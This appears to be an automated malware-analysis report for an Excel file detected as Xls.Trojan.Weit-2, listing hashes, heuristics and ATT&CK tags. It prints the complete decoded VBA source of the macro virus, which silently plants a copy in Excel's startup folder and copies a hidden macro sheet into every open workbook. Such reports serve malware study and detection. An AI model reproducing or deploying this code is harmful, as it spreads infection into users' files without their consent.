Xls.Trojan.Weit-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 e6ed09e4c57d330b…

MALICIOUS

Office (OLE)

50.0 KB · Created: 1999-02-08 09:24:15 · Authoring application: Microsoft Excel · First seen: 2012-06-14
MD5: 0a2ca7e84b9f952ef4ae04b6762b3d02
SHA-1: c56b1d73a4314a8858cfb289084768cca87aac43
SHA-256: e6ed09e4c57d330b45ef4d5c6aff7a6e0fb8a72678830c3102ff5d269021062e
Risk score: 300

Malware Insights

Xls.Trojan.Weit-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic · T1566.001 Spearphishing Attachment

The file is an Excel document with a high-confidence detection of VBA macros, specifically an Auto_Open macro, indicating it is designed to execute malicious code upon opening. ClamAV signatures identify it as 'Xls.Trojan.Weit-2'. The presence of VBA macros strongly suggests an initial access vector via spearphishing attachment.

Heuristics (6)

  • ClamAV: Xls.Trojan.Weit-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Weit-2
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 23,515 bytes but its declared streams total only 0 bytes — 23,515 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4034 bytes
SHA-256: 0a38183ea088ae0db0b5d11dcf9b98c0d2b53b9d733b7e319777032ec3ec00a7
Detection: ClamAV: Xls.Trojan.Weit-2
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "EXCELLS"

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Dim startpfad As String

    ' Suppress redraws and prompts so the save and sheet copies below are silent
    Application.ScreenUpdating = False
    Application.DisplayAlerts = False
    ' Build the drop path: <Excel startup folder>\_X_X_X_X.XLS
    startpfad = Application.StartupPath
    If Right$(startpfad, 1) = "\" Then
        startpfad = startpfad + "_X_X_X_X.XLS"
    Else
        startpfad = startpfad + "\_X_X_X_X.XLS"
    End If
    ' First run: save a copy of this workbook into the startup folder so it is
    ' loaded on every Excel start; otherwise close the probe handle left open
    ' by chk_first_time
    If chk_first_time(startpfad) Then
        ActiveWorkbook.SaveCopyAs (startpfad)
    Else
        Close #1
    End If
    ' Make sure there is at least one other workbook to copy the macro sheet into
    If Workbooks.Count <= 1 Then
        Workbooks.Add
    End If
    ' Copy the hidden "EXCELLS" macro sheet into every other open workbook and
    ' hook OnSheetDeactivate so weitergehts runs when the user switches sheets
    For Each w In Workbooks
        If w.Name <> ThisWorkbook.Name Then
            If Workbooks(w.Name).Sheets(1).Name <> "EXCELLS" Then
                ThisWorkbook.Sheets("EXCELLS").Copy before:=Workbooks(w.Name).Sheets(1)
                Workbooks(w.Name).Sheets("EXCELLS").Visible = False
                Application.OnSheetDeactivate = ActiveWorkbook.Name & "!EXCELLS.weitergehts"
            End If
        End If
    Next w
    Application.ScreenUpdating = True
    ' When running from the dropped startup copy, close it again; otherwise stay in front
    If ThisWorkbook.Name = "_X_X_X_X.XLS" Then
        ThisWorkbook.Close
    Else
        ThisWorkbook.Activate
    End If
End Sub

' Returns True when the file at datei cannot be opened (i.e. the startup copy
' does not exist yet). When it does exist, the file is left open as #1 and
' auto_open closes it.
Function chk_first_time(datei As String) As Integer
Attribute chk_first_time.VB_ProcData.VB_Invoke_Func = " \n14"
    chk_first_time = False
    On Error GoTo fehler
    Open (datei) For Input As 1
    On Error Resume Next
    Exit Function
fehler:
    chk_first_time = True
    Resume Next
End Function

' OnSheetDeactivate handler: copies the hidden macro sheet into any workbook
' opened after auto_open ran, then clears the hook
Sub weitergehts()
Attribute weitergehts.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.ScreenUpdating = False
    Application.DisplayAlerts = False
    On Error Resume Next
    For Each w In Workbooks
        If w.Name <> ThisWorkbook.Name Then
            If Workbooks(w.Name).Sheets(1).Name <> "EXCELLS" Then
                ThisWorkbook.Sheets("EXCELLS").Copy before:=Workbooks(w.Name).Sheets(1)
                Workbooks(w.Name).Sheets("EXCELLS").Visible = False
                Application.OnSheetDeactivate = ""
            End If
        End If
    Next w
    Application.ScreenUpdating = True
End Sub
embedded_office_off00006c25.ole | embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x6C25 | 23515 bytes
SHA-256: af6379aef62de0d6ebe4cfd10e1d6ab19e187f94abcd6d9e0e703932e9ec79a7